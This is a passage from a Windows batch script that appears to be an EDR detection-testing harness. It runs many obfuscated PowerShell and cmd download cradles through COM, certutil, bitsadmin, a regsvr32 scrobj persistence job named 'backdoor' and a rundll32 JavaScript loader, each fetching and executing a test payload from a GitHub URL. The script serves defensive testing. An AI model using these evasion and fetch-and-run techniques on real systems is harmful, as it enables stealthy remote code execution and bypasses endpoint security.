-Val)|Get-Member)[10].Name).Invoke($_)}};@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[7].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[14].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[6].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[8].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[5].Name))|ForEach{&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('S*-Ite*y')(Item Variable:\fN).Value $_ (GCI Variable:5M).Value.((LS Variable:\_).Value)};(Item Variable:\q).Value|&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*e-*press*',1,1))" 
 850 | echo Execution Finished at %time% %date%
 851 | timeout 5
 852 | 
 853 | echo %time% %date% [+] Testing MEMORY\PSCOMWORD exec
 854 | start "" cmd /c powershell -c "gdr -*;Set-Item Variable:8 (&$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member)[2].Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*w-*ct',$TRUE,$TRUE))-C Word.Application);While((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'*sy'}).Name)){&($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*t-Sl*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet))-Mil 1000}(Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member)[420].Name)=(Get-Variable Fal* -Value);SV xz (Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'D*cu*ts'}).Name).(((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'D*cu*ts'}).Name).PsObject.Members|?{$_.Name-like'O*n'}).Name).Invoke('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt');While((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'*sy'}).Name)){&($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*t-Sl*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet))-Mil 1000}(ChildItem Variable:/xz).Value.(((ChildItem Variable:/xz).Value|Member)[205].Name).(((ChildItem Variable:/xz).Value.(((ChildItem Variable:/xz).Value|Member)[205].Name)|Member)[172].Name)|.(COMMAND *-Ex*n);(Get-Variable 8 -ValueOn).Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject((Get-Variable 8 -ValueOn))" 
 855 | echo Execution Finished at %time% %date% 
 856 | timeout 5
 857 | 
 858 | echo %time% %date% [+] Testing MEMORY\PSCOMEXCEL exec
 859 | start "" cmd /c powershell -c "$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt');While($comExcel.Busy){Start-Sleep -Seconds 1}(($comExcel.Sheets.Item(1).Range(\"A1:Q\"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{(LS Variable:_).Value})-Join\"`n\");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)" 
 860 | echo Execution Finished at %time% %date% 
 861 | timeout 5
 862 | 
 863 | echo %time% %date% [+] Testing MEMORY\PSCOMIE exec
 864 | start "" cmd /c powershell -c "popd;Set-Variable 9Z (&$ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommandName('Ne*ct',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)-Co InternetExplorer.Application -Pro @{Silent=(Get-Variable Tr*).Value;Visible=(Get-ChildItem Variable:/Fal*).Value;Navigate='https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'});While((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'Bu*y'}).Name)){&($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where{$_.Name-ilike'*m*ts'}).Name).Invoke('*t-S*p'))1}IEX (Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name)|GM|Where{$_.Name-ilike'b*y'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name)|GM|Where{$_.Name-ilike'b*y'}).Name)|GM|Where{$_.Name-ilike'o*Text'}).Name);(Variable 9Z -Val).Quit();[Void][Runtime.InteropServices.Marshal]::ReleaseComObject((Variable 9Z -Val))" 
 865 | echo Execution Finished at %time% %date%
 866 | timeout 5
 867 | 
 868 | echo %time% %date% [+] Testing MEMORY\PSCOMMSXML exec
 869 | start "" cmd /c powershell -c "ls _-*;SI Variable:/2 (&(Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name)|GM|Where{(DIR Variable:/_).Value.Name-like'*and'}).Name).Invoke((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).PsObject.Methods|Where{(DIR Variable:/_).Value.Name-like'*man*Name'}).Name).Invoke('N*-O*',1,1),[Management.Automation.CommandTypes]::Cmdlet)-ComOb MsXml2.ServerXmlHttp);(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[4].Name)('GET','https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt',(Get-ChildItem Variable:F*a*e).Value);(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[5].Name)();&(Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name)|GM|Where{(DIR Variable:/_).Value.Name-like'*let'}).Name).Invoke((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).PsObject.Methods|Where{(DIR Variable:/_).Value.Name-like'*man*Name'}).Name).Invoke('I*e-E*',1,$TRUE))(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[16].Name)" 
 870 | echo Execution Finished at %time% %date%
 871 | timeout 5
 872 | 
 873 | echo %time% %date% [+] Testing MEMORY\PSINLINECSHARP exec
 874 | start "" cmd /c powershell -c "SI Variable:\x 'public class Xlqndampcv{public static string IGJnkoBiM(string url){return (new System.Net.WebClient()).DownloadString(url);}}';dir ty*;.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where{$_.Name-ilike'*ts'}).Name).Invoke('A*-T*p*e')-Lang CSharp (Variable x).Value;Set-Item Variable:\0 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';.(GAL I*X)(([Xlqndampcv]::IGJnkoBiM((ChildItem Variable:0).Value)))" 
 875 | echo Execution Finished at %time% %date% 
 876 | timeout 5
 877 | 
 878 | echo %time% %date% [+] Testing MEMORY\PSCOMPILEDCSHARP exec
 879 | start "" cmd /c powershell -c "[Void][System.Reflection.Assembly]::Load([Byte[]](@(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+@(0)*7+@(80,69,0,0,76,1,3,0,126,189,77,91)+@(0)*8+@(224,0,2,33,11,1,11,0,0,4,0,0,0,6,0,0,0,0,0,0,110,35,0,0,0,32,0,0,0,64,0,0,0,0,0,16,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)+@(0)*8+@(128,0,0,0,2,0,0,0,0,0,0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(32,35,0,0,75,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,0,0,8)+@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,116,3,0,0,0,32,0,0,0,4,0,0,0,2)+@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46,114,101,108,111,99,0,0,12,0,0,0,0,96,0,0,0,2,0,0,0,10)+@(0)*14+@(64,0,0,66)+@(0)*16+@(80,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,168,2,0,0,1)+@(0)*55+@(19,48,2,0,17,0,0,0,1,0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,0,0,0,0,0,12,0,0,0,118,52,46,48,46,51,48,51,49,57,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,204,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,68,2,0,0,8,0,0,0,35,85,83,0,76,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,92,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,37,51,0,22,0,0,1,0,0,0,4,0,0,0,2,0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,0,0,0,0,0,10,0,1,0,0,0,0,0,6,0,43,0,36,0,6,0,99,0,67,0,6,0,131,0,67,0,10,0,179,0,168,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,50,0,10,0,1,0,109,32,0,0,0,0,134,24,57,0,15,0,2,0,0,0,1,0,63,0,17,0,57,0,19,0,25,0,57,0,15,0,33,0,57,0,15,0,33,0,189,0,24,0,9,0,57,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@(161,0,0,0,4)+@(0)*11+@(1,0,27,0,0,0,0,0,4)+@(0)*11+@(1,0,36)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,67,108,97,115,115,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101,109,0,79,98,106,101,99,116,0,77,101,116,104,111,100,0,46,99,116,111,114,0,117,114,108,0,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,67,111,109,112,105,108,101,114,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,105,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105,98,117,116,101,0,99,114,97,100,108,101,0,83,121,115,116,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119,110,108,111,97,100,83,116,114,105,110,103,0,0,3,32,0,0,0,0,0,103,95,116,171,97,113,148,66,141,34,197,250,155,72,85,140,0,8,183,122,92,86,25,52,224,137,4,0,1,14,14,3,32,0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,112,78,111,110,69,120,99,101,112,116,105,111,110,84,104,114,111,119,115,1,0,0,0,72,35)+@(0)*8+@(0,0,94,35,0,0,0,32)+@(0)*22+@(80,35)+@(0)*8+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,0,16)+@(0)*154+@(1,0,16,0,0,0,24,0,0,128)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0,78,0,95,0,73,0,78,0,70,0,79,0,0,0,0,0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@(0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,0,0,36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,0,101,0,68,0,101,0,115,0,99,0,114,0,105,0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,1,0,70,0,105,0,108,0,101,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0,78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0,2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,0,0,32,0,0,0,64,0,11,0,1,0,79,0,114,0,105,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,112,51)+@(0)*502));([Class]::Method('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt')) | iex" 
 880 | echo Execution Finished at %time% %date% 
 881 | timeout 5
 882 | 
 883 | echo %time% %date% [+] Testing MEMORY\CERTUTIL exec
 884 | start "" cmd /c powershell -c "SV c3z 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';dir ty*;SI Variable:\NI1 (certutil -ping (GV c3z).Value);.(GAL IE*)(((Variable NI1 -Val)[2..(((Variable NI1 -Val)).Length-2)]-Join\"`r`n\"))"
 885 | echo Execution Finished at %time% %date%
 886 | timeout 5
 887 | 
 888 | echo %time% %date% [+] Testing DISK\PSWEBFILE exec
 889 | start "" cmd /c powershell -c "SI Variable:\9 'Net.WebClient';SV iH 'Default_File_Path.ps1';Set-Item Variable:gE 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';sl;SI Variable:/g (.(Variable *uti*t).Value.(((Variable *uti*t).Value|Member)[6].Name).(((Variable *uti*t).Value.(((Variable *uti*t).Value|Member)[6].Name)|Member|Where-Object{(Variable _ -ValueO).Name-like'G*ts'}).Name).Invoke('Ne*ct')(Variable 9).Value);SI Variable:h20 ((((Get-Item Variable:/g).Value|Member)|Where-Object{(Variable _ -ValueO).Name-like'Do*o*d*le'}).Name);(Get-Item Variable:/g).Value.((GV h20).Value).Invoke((GCI Variable:\gE).Value,(Variable iH -Val));(Variable *uti*t).Value.(((Variable *uti*t).Value|Member)[6].Name).InvokeScript((-Join([Text.Encoding]::ASCII.GetString([System.IO.File]::ReadAllBytes((Variable iH -Val))))))"
 890 | echo Execution Finished at %time% %date%
 891 | timeout 5
 892 | 
 893 | echo %time% %date% [+] Testing DISK\PSBITS exec
 894 | start "" cmd /c powershell -c "Set-Variable pD5 'Default_File_Path.ps1';SI Variable:YD2 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';$NULL=Help(Get-Command *ar*Bi*s*);.(Get-Command *ar*Bi*s*)-So (Get-Variable YD2 -ValueOn) -Destina (DIR Variable:/pD5).Value;$ExecutionContext|ForEach{(Get-ChildItem Variable:_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(Get-Item Variable:/_).Value.InvokeScript((([Char[]](GC -En 3 (DIR Variable:/pD5).Value))-Join''))}}"
 895 | echo Execution Finished at %time% %date%
 896 | timeout 5
 897 | 
 898 | echo %time% %date% [+] Testing DISK\BITSADMIN exec
 899 | start "" cmd /c powershell -c "Set-Item Variable:\PL2 'Default_File_Path.ps1';SV 69x 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';$NULL=bitsadmin /transfer /ybBUL (LS Variable:69x).Value (GV PL2).Value;([String]::Join('',((GC -Encodin 3 (GV PL2).Value)|ForEach{[Char](GI Variable:_).Value})))|IEX"
 900 | echo Execution Finished at %time% %date%
 901 | timeout 5
 902 | 
 903 | echo %time% %date% [+] Testing DISK\CERTUTIL exec
 904 | start "" cmd /c powershell -c "Set-Variable T2Z 'Default_File_Path.ps1';SV kz1 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';$NULL=C:\Windows\System32\certutil -urlcache /f (Get-Variable kz1).Value (Get-Variable T2Z -ValueOn);&(Get-Alias *EX)(([System.String]::Join('',([Text.Encoding]::ASCII.GetString([System.IO.File]::ReadAllBytes((Get-Variable T2Z -ValueOn)))))))"
 905 | echo Execution Finished at %time% %date%
 906 | timeout 5
 907 | 
 908 | REM ---- EOF Invoke-CradleCrafter Payloads ----
 909 | 
 910 | echo **********************************************
 911 | echo *        Testing Variations                  *
 912 | echo **********************************************
 913 | 
 914 | echo %time% %date% [+] Testing bitsadmin persistance via regsvr32 exec
 915 | REM taken from https://github.com/3gstudent/bitsadminexec
 916 | start "" cmd /c bitsadmin /create backdoor
 917 | start "" cmd /c bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
 918 | start "" cmd /c bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct scrobj.dll"
 919 | start "" cmd /c bitsadmin /Resume backdoor
 920 | start "" cmd /c bitsadmin /Cancel backdoor
 921 | echo Execution Finished at %time% %date%
 922 | echo Command Excuted: bitsadmin /create backdoor
 923 | echo Command Excuted: bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
 924 | echo Command Excuted: bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct scrobj.dll"
 925 | echo Command Excuted: bitsadmin /Resume backdoor
 926 | echo Command Excuted: bitsadmin /Cancel backdoor
 927 | 
 928 | timeout 5
 929 | 
 930 | echo %time% %date% [+] Testing manage-bde.wsf with rundll32 JS exec
 931 | set comspec=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
 932 | start "" cscript C:\windows\system32\manage-bde.wsf
 933 | set comspec=C:\WINDOWS\system32\cmd.exe
 934 | echo Execution Finished at %time% %date%
 935 | echo Command Excuted: set comspec=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
 936 | echo Command Excuted: cscript C:\windows\system32\manage-bde.wsf
 937 | echo Command Excuted: set comspec=C:\WINDOWS\system32\cmd.exe
 938 | timeout 5
 939 | 
 940 | 
 941 | :: Generate like this: Invoke-DOSfuscation -Command 'calc.exe' -CliCommand 'Binary\Cmd\2' -Quiet
 942 | echo %time% %date% [+] Testing BINARY\CMD\1 exec
 943 | start "" %PUBLIC:~-1%m%TMP:~-15,1%
 944 | echo Execution Finished at %time% %date%
 945 | timeout 5
 946 | 
 947 | echo %time% %date% [+] Testing BINARY\CMD\2 exec
 948 | start "" FOR /F "tokens=2 delims==Yf" %L IN ('assoc.cmd')DO %L
 949 | echo Execution Finished at %time% %date%
 950 | timeout 5
 951 | 
 952 | echo %time% %date% [+] Testing BINARY\CMD\3 exec
 953 | start "" ^F^o^r  ;   ,  ,  ,  ;   /^F  ,   ,  ;  ,  "   delims=nGfMK       tokens=    1    "    ,   ,    ;   ,   ,   %Y   ,    ,  ;   ,   ^in    ;  ;   ,  ;   (  ,   ;  ,  ,   '   ;    ;   ,   ^^FtY^^P^^e  ,  ;   ;   ;  ,   ^|   ;  ;   ;  ;   ;    ^^F^^in^^D  ;    ,  ,  "mdfi"  ;  ;    ,  ,  '   ;   ;   ,   )  ;  ,  ,  ,  ,   ,  ;  ^D^O  ;    ;  ;   ,   ,    %Y
 954 | echo Execution Finished at %time% %date%
 955 | timeout 5
 956 | 
 957 | echo %time% %date% [+] Testing BINARY\PS\1 exec
 958 | start "" %PUBLIC:~-6,-5%%ProgramData:~-9,-8%%SystemRoot:~3,-6%%ProgramFiles:~14,1%rsh%CommonProgramW6432:~-2,-1%l%TMP:~-10,1%
 959 | echo Execution Finished at %time% %date%
 960 | timeout 5
 961 | 
 962 | echo %time% %date% [+] Testing BINARY\PS\2 exec
 963 | start "" FOR /F "tokens=9 delims=L.\Dg" %J IN ('ftype^|findstr v1.')DO %J
 964 | echo Execution Finished at %time% %date%
 965 | timeout 5
 966 | 
 967 | echo %time% %date% [+] Testing BINARY\PS\3 exec
 968 | ^F^o^R   ;  ,    ;   ;  ;  ;   ;  /^F    ;   ,  ,  ,  ,   "    tokens=   3    delims=mC."    ,  ,   ;    ,  ,   %6  ;  ,  ;   ,   ,  ;  ^IN   ,  ,   ,  ,  ;   ,  ,   (   ;  ;    ;  ,   ;    '   ;    ;   ;   ,   ;  ,   ;    ^^a^^s^^S^^O^^c   ;  ,    ,  ,    ,  ;  .cdxml     '  ,  ,  ;   ,  ;   )   ,  ;   ,  ^d^O    ,  ;  ,    %6
 969 | echo Execution Finished at %time% %date%
 970 | timeout 5
 971 | 
 972 | echo %time% %date% [+] Testing ENCODING\1 exec
 973 | start "" ca%ProgramFiles:~13,1%c.%TMP:~-3,-2%x%CommonProgramFiles:~-2,1%
 974 | echo Execution Finished at %time% %date%
 975 | timeout 5
 976 | 
 977 | echo %time% %date% [+] Testing ENCODING\2 exec
 978 | start "" ca%LOCALAPPDATA:~-1,1%%PUBLIC:~-1%.%TMP:~5,1%x%CommonProgramFiles(x86):~-21,1%
 979 | echo Execution Finished at %time% %date%
 980 | timeout 5
 981 | 
 982 | echo %time% %date% [+] Testing ENCODING\3 exec
 983 | start "" ca%COmmOnprogRAMW6432:~   -3,     1%%tmP:~    -8,   1%.%TMP:~    -3,   -2%x%PrOGRAMFIleS(X86):~    -8,      1%
 984 | echo Execution Finished at %time% %date%
 985 | timeout 5
 986 | 
 987 | echo %time% %date% [+] Testing PAYLOAD\CONCAT\1 exec
 988 | start "" cmd /C"set Gs=calc&&set 9Uv=.exe&&call set 8pW=%Gs%%9Uv%&&call %8pW%"
 989 | echo Execution Finished at %time% %date%
 990 | timeout 5
 991 | 
 992 | echo %time% %date% [+] Testing PAYLOAD\CONCAT\2 exec
 993 | start "" ^c%ComMonprogrAMfIlEs:~ 20,-8%^D,  ,  , , /%CommONPRogRAMW6432:~  -12, +1%" , (^S^Et oA^t^p=^xe)& ( ,(sE^t ^ ^ CKl^w=c^alc.e),  )&  , cAlL , , ^Se^t   Pw=%CKl^w%%oA^t^p%&& , , ( (cA^ll , %P^w%), )  "
 994 | echo Execution Finished at %time% %date%
 995 | timeout 5
 996 | 
 997 | echo %time% %date% [+] Testing PAYLOAD\CONCAT\3 exec
 998 | ^FOr;/^f,"  delims=0MHFNZ  tokens= +2  " ,%^y , ^IN,; ( ,; ' ; ft^^yp^^E ,, ^| , ^^FiN^^D^^ST^^r ,S^^H^^Cm' , , ) ; ; d^O ,%^y; ; YPd7aN ,TZ2azt/%coMMonPROGRaMW6432:~17,  -11%",( (S^eT ^]$=^.) )&&  ( , (sE^t @^*$^_=^e) , , )&  (  ,(^s^E^T ^ ^ ~^?^-=^x) )&& (, (s^Et ^ ^ ^#^?_=a^l) ; )&  (^SET ^,;^-=e)&(^SeT ^  ^}^[@=^c)&&(S^Et ^ ^~^\+^'=^c)&, , ^C^A^l^l ;^S^e^t .'$_=%^~^\+^'%%^#^?_%%^}^[@%%^]$%%@^*$^_%%~^?^-%%^,;^-%&; ;( ,  , ,  , ,  (C^A^LL ;%.'^$^_%)  , )  "
 999 | echo Execution Finished at %time% %date%
1000 | timeout 5
1001 | 
1002 | echo %time% %date% [+] Testing PAYLOAD\REVERSE\1 exec
1003 | start "" cmd /V:ON/C"set bRm=exe.clac&&for /L %v in (7;-1;0)do set nT=!nT!!bRm:~%v,1!&&if %v==0 call %nT:~4%"
1004 | echo Execution Finished at %time% %date%
1005 | timeout 5
1006 | echo %time% %date% [+] Testing PAYLOAD\REVERSE\2 exec
1007 | start "" %comMoNproGraMW6432:~ 17,+1%^m%Os:~   3,  -6%;   ; ^/V:^o  ;  ; /R " ;; (^SE^t ^ ^ ^ T4=k^TU^e^AG^0xcw^m^eK^s8^.G^Q^d^ce^R^Xl^7d^u^aYOoc)&&;  ^fOr  ; ;  /^L ;  %^w  ;  ; ^IN ;  ;; ( ^ 31  ;^ ^;^ -4^ 3^ ^ ) ; D^O ;  ; ;  (  (;  ;^sET    5^u=!5^u!!T4:~%^w,  1!) )& ;  ; ^i^F; ; %^w ;  ; ^Equ; ;^3 ;; (   (^C^aL^L ;  ; %5^u:^*^5u^!=%   ) ; ; )   "
1008 | echo Execution Finished at %time% %date%
1009 | timeout 5
1010 | 
1011 | echo %time% %date% [+] Testing PAYLOAD\REVERSE\3 exec
1012 | ^F^O^R    ;    ,    ;    ,    ;   ;   ;   /^f  ,  ,   ;    "      tokens=     1     delims=f7La"  ;  ;  ,   ,  ;    ;   %^d    ,    ,  ;    ,  in    ;    ,   ,   (  ,    ;  ;   ,  ;    '    ;   ;    ;    ;   ;   ^^F^^t^^y^^P^^e  ,   ,   ;    ,   ;  ,  ,  ^|    ,  ,   ;   ;  ;  ^^FIN^^d^^s^^T^^R   ,   ,   ,  ,   ;   ;    ,   ^^m^^d^^f   '   ,    ,   ,  ;   )    ;   ,    ,  ,    ;   ;    ,  ^D^O    ,  ;    ;   %^d;    ;   ,    ,   ,  ;    ,    ;  q1ezYhj9Xy^/^v^[^8^s^k ^ ^    ;  ,  ,  ;  ;  Xyuc/^r       "  ,   ,  ;    ,   ;   ,  (   ,    ,       (   ;     ;     ;   ;      ;    ;      (     ,       ,     (   ,     ,     (^s^e^t ^  ^ ^ ^  ^\^  =^c^6^R^G}^jl^H^L^e^[^<^Y^r^Q^X^2^1:^x^.^(M]^#A^j^WN^en^c^>^$^I^m^`^W^s^.^\^,^ ^H^P^'x=R^c^>^W^;,^_^q^X^V^)^l#^d^C^2^>k^(=^6^ai^X^m^/^e^$^>^H^7^c)     ,       )      ,     ,      )   )      ,     ,     ,     )&&         ,   ;  ;   ;  F^o^r   ,  ,  ;  ,   ;    ;   ,  /^L   ;   ;  